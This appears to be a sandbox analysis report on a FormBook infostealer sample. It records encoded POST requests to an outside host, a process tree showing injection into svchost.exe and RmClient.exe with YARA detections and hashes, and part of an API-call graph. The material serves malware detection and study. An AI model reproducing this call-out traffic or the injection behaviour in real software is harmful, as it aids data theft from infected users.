Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Referer: http://www.polarmuseum.info/nuqv/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 52 6f 35 59 65 74 71 48 6c 6d 6b 38 43 6f 62 47 64 4e 55 77 72 43 2b 53 5a 78 2b 6e 44 7a 54 30 6d 38 36 32 55 58 6e 36 47 59 32 56 4e 72 59 6e 6f 54 38 4a 59 4d 55 44 4f 47 2f 39 55 6a 35 68 31 44 64 36 64 67 4f 39 4d 64 75 7a 4a 58 49 55 55 5a 6d 45 39 69 4c 64 53 65 33 2f 78 53 6a 4a 30 52 52 5a 41 4a 78 2b 46 44 46 55 70 4f 73 4f 66 53 31 58 68 39 54 72 48 52 45 2f 59 2b 76 61 76 6e 49 6a 6f 76 4b 74 78 74 76 35 7a 36 67 52 46 6d 51 6c 36 32 4f 74 6e 46 55 72 4b 55 30 75 4b 2b 6f 61 4e 52 6b 73 68 48 30 71 77 56 79 44 71 39 2b 62 6a 4e 6a 41 78 44 35 6a 39 79 68 31 62 6f 78 70 4c 2f 6d 38 39 67 70 7a 62 32 75 37 64 31 71 57 4a 56 41 79 69 76 78 39
                                                                                                                  Data Ascii: nV=Ro5YetqHlmk8CobGdNUwrC+SZx+nDzT0m862UXn6GY2VNrYnoT8JYMUDOG/9Uj5h1Dd6dgO9MduzJXIUUZmE9iLdSe3/xSjJ0RRZAJx+FDFUpOsOfS1Xh9TrHRE/Y+vavnIjovKtxtv5z6gRFmQl62OtnFUrKU0uK+oaNRkshH0qwVyDq9+bjNjAxD5j9yh1boxpL/m89gpzb2u7d1qWJVAyivx9
Oct 8, 2024 15:40:59.093717098 CEST | 1236              | IN        | HTTP/1.1 200 OK
date: Tue, 08 Oct 2024 13:40:58 GMT
content-type: text/html; charset=utf-8
content-length: 1130
x-request-id: 61b33c5a-b006-48b6-bec8-150a824f734c
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bwwSsOG/hTj7Z+Eakf3+Bt00ZJwan5TDSf5fy7MIYb1IWMhYqLtHMy5blwXa+1aZ9H1OKKTs5DWiKPWVk7obdA==
set-cookie: parking_session=61b33c5a-b006-48b6-bec8-150a824f734c; expires=Tue, 08 Oct 2024 13:55:59 GMT; path=/
connection: close
                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 77 77 53 73 4f 47 2f 68 54 6a 37 5a 2b 45 61 6b 66 33 2b 42 74 30 30 5a 4a 77 61 6e 35 54 44 53 66 35 66 79 37 4d 49 59 62 31 49 57 4d 68 59 71 4c 74 48 4d 79 35 62 6c 77 58 61 2b 31 61 5a 39 48 31 4f 4b 4b 54 73 35 44 57 69 4b 50 57 56 6b 37 6f 62 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bwwSsOG/hTj7Z+Eakf3+Bt00ZJwan5TDSf5fy7MIYb1IWMhYqLtHMy5blwXa+1aZ9H1OKKTs5DWiKPWVk7obdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 8, 2024 15:40:59.093744993 CEST | 583 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjFiMzNjNWEtYjAwNi00OGI2LWJlYzgtMTUwYTgyNGY3MzRjIiwicGFnZV90aW1lIjoxNzI4Mzk0OD


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
47         | 192.168.2.5 | 50022       | 199.59.243.227 | 80               | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp                           | Bytes transferred | Direction | Data
Oct 8, 2024 15:41:01.165079117 CEST | 1770              | OUT       | POST /nuqv/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.polarmuseum.info
Origin: http://www.polarmuseum.info
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1239
Referer: http://www.polarmuseum.info/nuqv/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 52 6f 35 59 65 74 71 48 6c 6d 6b 38 43 6f 62 47 64 4e 55 77 72 43 2b 53 5a 78 2b 6e 44 7a 54 30 6d 38 36 32 55 58 6e 36 47 5a 4f 56 4f 59 51 6e 35 43 38 4a 5a 4d 55 44 48 6d 2f 38 55 6a 34 6a 31 44 46 32 64 67 43 48 4d 66 57 7a 50 78 30 55 53 73 53 45 33 69 4c 64 50 4f 33 38 73 43 69 54 30 52 42 46 41 4b 5a 2b 46 44 46 55 70 49 41 4f 57 67 64 58 6e 39 54 73 52 68 45 7a 54 65 76 69 76 6e 51 5a 6f 76 50 59 78 65 33 35 30 61 77 52 47 51 45 6c 31 32 4f 56 33 56 55 4e 4b 55 34 74 4b 2f 46 6a 4e 53 35 48 68 45 6b 71 38 69 4c 65 2f 74 4f 7a 67 76 44 5a 36 78 31 48 6a 69 74 46 54 5a 55 61 43 64 53 48 36 68 64 42 51 54 79 65 4a 45 66 74 4e 52 51 35 71 76 67 44 35 75 54 68 34 41 75 71 55 42 6f 5a 34 59 77 58 4f 6a 2f 52 63 2f 52 64 74 6a 6a 77 4e 6d 4a 55 74 49 44 51 4c 70 68 7a 69 6c 6c 30 45 6d 6a 2b 72 67 37 2b 45 70 32 75 33 34 71 36 50 56 72 53 72 6d 48 61 47 4f 47 45 2b 37 4b 65 52 4b 36 4d 48 6e 30 75 39 71 50 70 4a 4d 48 44 45 4c 68 52 4e 5a 4c 34 2b 37 57 30 6f 6e 6e 47 62 75 61 2b 4e 62 35 [TRUNCATED]
                                                                                                                  Data Ascii: nV=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 [TRUNCATED]
Oct 8, 2024 15:41:01.635869026 CEST | 1236              | IN        | HTTP/1.1 200 OK
date: Tue, 08 Oct 2024 13:41:00 GMT
content-type: text/html; charset=utf-8
content-length: 1130
x-request-id: 6bc7d244-35a7-440e-98c4-54b464a070d6
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bwwSsOG/hTj7Z+Eakf3+Bt00ZJwan5TDSf5fy7MIYb1IWMhYqLtHMy5blwXa+1aZ9H1OKKTs5DWiKPWVk7obdA==
set-cookie: parking_session=6bc7d244-35a7-440e-98c4-54b464a070d6; expires=Tue, 08 Oct 2024 13:56:01 GMT; path=/
connection: close
                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 77 77 53 73 4f 47 2f 68 54 6a 37 5a 2b 45 61 6b 66 33 2b 42 74 30 30 5a 4a 77 61 6e 35 54 44 53 66 35 66 79 37 4d 49 59 62 31 49 57 4d 68 59 71 4c 74 48 4d 79 35 62 6c 77 58 61 2b 31 61 5a 39 48 31 4f 4b 4b 54 73 35 44 57 69 4b 50 57 56 6b 37 6f 62 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bwwSsOG/hTj7Z+Eakf3+Bt00ZJwan5TDSf5fy7MIYb1IWMhYqLtHMy5blwXa+1aZ9H1OKKTs5DWiKPWVk7obdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 8, 2024 15:41:01.635988951 CEST | 583 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmJjN2QyNDQtMzVhNy00NDBlLTk4YzQtNTRiNDY0YTA3MGQ2IiwicGFnZV90aW1lIjoxNzI4Mzk0OD


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
48         | 192.168.2.5 | 50023       | 199.59.243.227 | 80               | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp                           | Bytes transferred | Direction | Data
Oct 8, 2024 15:41:03.711556911 CEST | 474               | OUT       | GET /nuqv/?nV=cqR4daz/40w4b6rdKNYqvkeleB2fEiPhnuSAX3LrEIyAZ4914Ww4a7UdeW+JTGwq/HZWal2FK/CEDxgqbNyvyy/SGYyigH7HtG4hHq89KwpktbUpTg5pzo/PCicdM9eRug==&ntHx=DVDDWR70P4Ux HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.polarmuseum.info
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 8, 2024 15:41:04.179184914 CEST | 1236              | IN        | HTTP/1.1 200 OK
date: Tue, 08 Oct 2024 13:41:03 GMT
content-type: text/html; charset=utf-8
content-length: 1510
x-request-id: 4e0fccc2-8cf4-4e23-a5f1-bdaea6154564
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hVVvaXIGWJy98LIQVSiYZECljelhPhzKyUE/LltVNXpqzO1n0R2ke2YbCeJ1f4CQ2Rzt8t2jj+I7tZpnvTxziA==
set-cookie: parking_session=4e0fccc2-8cf4-4e23-a5f1-bdaea6154564; expires=Tue, 08 Oct 2024 13:56:04 GMT; path=/
connection: close
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hVVvaXIGWJy98LIQVSiYZECljelhPhzKyUE/LltVNXpqzO1n0R2ke2YbCeJ1f4CQ2Rzt8t2jj+I7tZpnvTxziA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 8, 2024 15:41:04.179466963 CEST  963  IN
Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGUwZmNjYzItOGNmNC00ZTIzLWE1ZjEtYmRhZWE2MTU0NTY0IiwicGFnZV90aW1lIjoxNzI4Mzk0OD



Target ID: 0
Start time: 09:37:12
Start date: 08/10/2024
Path: C:\Users\user\Desktop\enkJ6J7dAn.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\enkJ6J7dAn.exe"
Imagebase: 0x400000
File size: 1'402'195 bytes
MD5 hash: DC1B0B674722F76E68CDFCD373C34AB9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 09:37:13
Start date: 08/10/2024
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\enkJ6J7dAn.exe"
Imagebase: 0xba0000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: true

Target ID: 3
Start time: 09:37:25
Start date: 08/10/2024
Path: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe"
Imagebase: 0x400000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 5
Start time: 09:37:30
Start date: 08/10/2024
Path: C:\Windows\SysWOW64\RmClient.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\RmClient.exe"
Imagebase: 0xc30000
File size: 15'360 bytes
MD5 hash: CE765DCC7CDFDC1BFD94CCB772C75E41
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation: moderate
Has exited: false

Target ID: 6
Start time: 09:37:43
Start date: 08/10/2024
Path: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe"
Imagebase: 0x400000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 8
Start time: 09:37:55
Start date: 08/10/2024
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase: 0x7ff79f9e0000
File size: 676'768 bytes
MD5 hash: C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 3.4%
Dynamic/Decrypted Code Coverage: 1.5%
Signature Coverage: 8.9%
Total number of Nodes: 2000
Total number of Limit Nodes: 37
86526 41f6d8 86521->86526 86527 417f77 46 API calls __getptd_noexit 86522->86527 86524->86521 86524->86526 86525 41f694 86525->86513 86526->86513 86527->86525 86531 416b0d 86528->86531 86529 4135bb _malloc 45 API calls 86529->86531 86530 416b43 86530->86454 86531->86529 86531->86530 86532 416b24 Sleep 86531->86532 86533 416b39 86532->86533 86533->86530 86533->86531 86534->86467 86536 413753 RtlFreeHeap 86535->86536 86540 41377c _free 86535->86540 86537 413768 86536->86537 86536->86540 86544 417f77 46 API calls __getptd_noexit 86537->86544 86539 41376e GetLastError 86539->86540 86540->86465 86545 417daa 86541->86545 86544->86539 86546 417dc9 __crtGetStringTypeA_stat __call_reportfault 86545->86546 86547 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86546->86547 86550 417eb5 __call_reportfault 86547->86550 86549 417ed1 GetCurrentProcess TerminateProcess 86549->86473 86551 41a208 86550->86551 86552 41a210 86551->86552 86553 41a212 IsDebuggerPresent 86551->86553 86552->86549 86559 41fe19 86553->86559 86556 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86557 421ff0 __call_reportfault 86556->86557 86558 421ff8 GetCurrentProcess TerminateProcess 86556->86558 86557->86558 86558->86549 86559->86556 86560->86477 86562 408f48 ctype 86561->86562 86563 4265c7 VariantClear 86562->86563 86564 408f55 ctype 86562->86564 86563->86564 86564->86482 86621 40ebd0 86565->86621 86625 4182cb 86568->86625 86570 41195e 86632 4181f2 LeaveCriticalSection 86570->86632 86572 40d748 86573 4119b0 86572->86573 86574 4119d6 86573->86574 86575 4119bc 86573->86575 86574->86490 86575->86574 86667 417f77 46 API calls __getptd_noexit 86575->86667 86577 4119c6 86668 417f25 10 API calls _xtow_s@20 86577->86668 86579 4119d1 86579->86490 86580->86492 86669 401f20 86581->86669 86583 40d5b6 IsDebuggerPresent 86584 40d5c4 86583->86584 86585 42e1bb MessageBoxA 86583->86585 86586 42e1d4 86584->86586 86587 40d5e3 86584->86587 86585->86586 86841 403a50 52 API calls 3 
library calls 86586->86841 86739 40f520 86587->86739 86591 40d5fd GetFullPathNameW 86751 401460 86591->86751 86593 40d63b 86594 40d643 86593->86594 86596 42e231 SetCurrentDirectoryW 86593->86596 86595 40d64c 86594->86595 86842 432fee 6 API calls 86594->86842 86766 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86595->86766 86596->86594 86599 42e252 86599->86595 86601 42e25a GetModuleFileNameW 86599->86601 86603 42e274 86601->86603 86604 42e2cb GetForegroundWindow ShellExecuteW 86601->86604 86843 401b10 86603->86843 86608 40d688 86604->86608 86605 40d656 86607 40d669 86605->86607 86610 40e0c0 74 API calls 86605->86610 86774 4091e0 86607->86774 86612 40d692 SetCurrentDirectoryW 86608->86612 86610->86607 86612->86494 86615 42e28d 86850 40d200 52 API calls 2 library calls 86615->86850 86618 42e299 GetForegroundWindow ShellExecuteW 86619 42e2c6 86618->86619 86619->86608 86620 40ec00 LoadLibraryA GetProcAddress 86620->86485 86622 40d72e 86621->86622 86623 40ebd6 LoadLibraryA 86621->86623 86622->86485 86622->86620 86623->86622 86624 40ebe7 GetProcAddress 86623->86624 86624->86622 86626 4182e0 86625->86626 86627 4182f3 EnterCriticalSection 86625->86627 86633 418209 86626->86633 86627->86570 86629 4182e6 86629->86627 86660 411924 46 API calls 3 library calls 86629->86660 86632->86572 86634 418215 _doexit 86633->86634 86635 418225 86634->86635 86636 41823d 86634->86636 86661 418901 46 API calls 2 library calls 86635->86661 86639 416b04 __malloc_crt 45 API calls 86636->86639 86642 41824b _doexit 86636->86642 86638 41822a 86662 418752 46 API calls 8 library calls 86638->86662 86641 418256 86639->86641 86644 41825d 86641->86644 86645 41826c 86641->86645 86642->86629 86643 418231 86663 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86643->86663 86664 417f77 46 API calls __getptd_noexit 86644->86664 86646 4182cb __lock 45 API calls 86645->86646 86649 418273 86646->86649 86651 4182a6 86649->86651 86652 41827b 
InitializeCriticalSectionAndSpinCount 86649->86652 86655 413748 _free 45 API calls 86651->86655 86653 418297 86652->86653 86654 41828b 86652->86654 86666 4182c2 LeaveCriticalSection _doexit 86653->86666 86656 413748 _free 45 API calls 86654->86656 86655->86653 86657 418291 86656->86657 86665 417f77 46 API calls __getptd_noexit 86657->86665 86661->86638 86662->86643 86664->86642 86665->86653 86666->86642 86667->86577 86668->86579 86851 40e6e0 86669->86851 86673 401f41 GetModuleFileNameW 86869 410100 86673->86869 86675 401f5c 86881 410960 86675->86881 86678 401b10 52 API calls 86679 401f81 86678->86679 86884 401980 86679->86884 86681 401f8e 86682 408f40 VariantClear 86681->86682 86683 401f9d 86682->86683 86684 401b10 52 API calls 86683->86684 86685 401fb4 86684->86685 86686 401980 53 API calls 86685->86686 86687 401fc3 86686->86687 86688 401b10 52 API calls 86687->86688 86689 401fd2 86688->86689 86892 40c2c0 86689->86892 86691 401fe1 86692 40bc70 52 API calls 86691->86692 86693 401ff3 86692->86693 86910 401a10 86693->86910 86695 401ffe 86917 4114ab 86695->86917 86698 428b05 86700 401a10 52 API calls 86698->86700 86699 402017 86701 4114ab __wcsicoll 58 API calls 86699->86701 86703 428b18 86700->86703 86702 402022 86701->86702 86702->86703 86704 40202d 86702->86704 86705 401a10 52 API calls 86703->86705 86706 4114ab __wcsicoll 58 API calls 86704->86706 86707 428b33 86705->86707 86708 402038 86706->86708 86710 428b3b GetModuleFileNameW 86707->86710 86709 402043 86708->86709 86708->86710 86711 4114ab __wcsicoll 58 API calls 86709->86711 86712 401a10 52 API calls 86710->86712 86713 40204e 86711->86713 86714 428b6c 86712->86714 86715 402092 86713->86715 86720 401a10 52 API calls 86713->86720 86722 428b90 _wcscpy 86713->86722 86716 40e0a0 52 API calls 86714->86716 86717 4020a3 86715->86717 86715->86722 86718 428b7a 86716->86718 86719 428bc6 86717->86719 86925 40e830 53 API calls 86717->86925 86721 401a10 52 API calls 86718->86721 86724 402073 _wcscpy 86720->86724 86725 
428b88 86721->86725 86726 401a10 52 API calls 86722->86726 86730 401a10 52 API calls 86724->86730 86725->86722 86734 4020d0 86726->86734 86727 4020bb 86926 40cf00 53 API calls 86727->86926 86729 4020c6 86731 408f40 VariantClear 86729->86731 86730->86715 86731->86734 86732 402110 86736 408f40 VariantClear 86732->86736 86734->86732 86737 401a10 52 API calls 86734->86737 86927 40cf00 53 API calls 86734->86927 86928 40e6a0 53 API calls 86734->86928 86738 402120 ctype 86736->86738 86737->86734 86738->86583 86740 40f53c 86739->86740 86742 4295c9 __crtGetStringTypeA_stat 86739->86742 87607 410120 86740->87607 86744 4295d9 GetOpenFileNameW 86742->86744 86743 40f545 87611 4102b0 SHGetMalloc 86743->87611 86744->86740 86746 40d5f5 86744->86746 86746->86591 86746->86593 86747 40f54c 87616 410190 GetFullPathNameW 86747->87616 86749 40f559 87627 40f570 86749->87627 87689 402400 86751->87689 86753 40146f 86757 428c29 _wcscat 86753->86757 87698 401500 86753->87698 86755 40147c 86755->86757 87706 40d440 86755->87706 86758 401489 86758->86757 86759 401491 GetFullPathNameW 86758->86759 86760 402160 52 API calls 86759->86760 86761 4014bb 86760->86761 86762 402160 52 API calls 86761->86762 86763 4014c8 86762->86763 86763->86757 86764 402160 52 API calls 86763->86764 86765 4014ee 86764->86765 86765->86593 86767 428361 86766->86767 86768 4103fc LoadImageW RegisterClassExW 86766->86768 87726 44395e EnumResourceNamesW LoadImageW 86767->87726 87725 410490 7 API calls 86768->87725 86771 40d651 86773 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86771->86773 86772 428368 86773->86605 86775 409202 86774->86775 86776 42d7ad 86774->86776 86831 409216 ctype 86775->86831 87989 410940 331 API calls 86775->87989 87992 45e737 90 API calls 3 library calls 86776->87992 86779 409386 86780 40939c 86779->86780 87990 40f190 10 API calls 86779->87990 86780->86608 86840 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 86780->86840 86782 4095b2 86782->86780 86784 4095bf 86782->86784 86783 
